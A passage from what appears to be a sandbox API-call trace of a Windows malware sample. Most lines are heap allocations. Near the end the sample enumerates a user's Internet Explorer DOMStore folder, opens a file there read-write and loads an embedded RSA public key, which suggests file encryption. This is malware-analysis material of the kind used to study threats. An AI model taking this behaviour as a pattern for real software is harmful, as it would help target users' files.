returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.401] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.402] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.403] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x9c778e8 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.405] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x32907e8 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262b28 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32907e8 | out: hHeap=0x660000) returned 1 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x32575c0 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262b28 | out: hHeap=0x660000) returned 1 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86f50 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.406] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86f50 | out: hHeap=0x660000) returned 1 [0061.406] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.407] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.407] PathFindFileNameW (pszPath="") returned="" [0061.407] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.407] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.408] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.408] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0061.408] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228df0 [0061.408] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11e) returned 0x3234418 [0061.408] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228df0 | out: hHeap=0x660000) returned 1 [0061.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0061.408] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.409] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=13) returned 1 [0061.409] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.411] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.411] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd, lpOverlapped=0x0) returned 1 [0061.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.412] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.412] lstrlenA (lpString="-----BEGIN PUBLIC 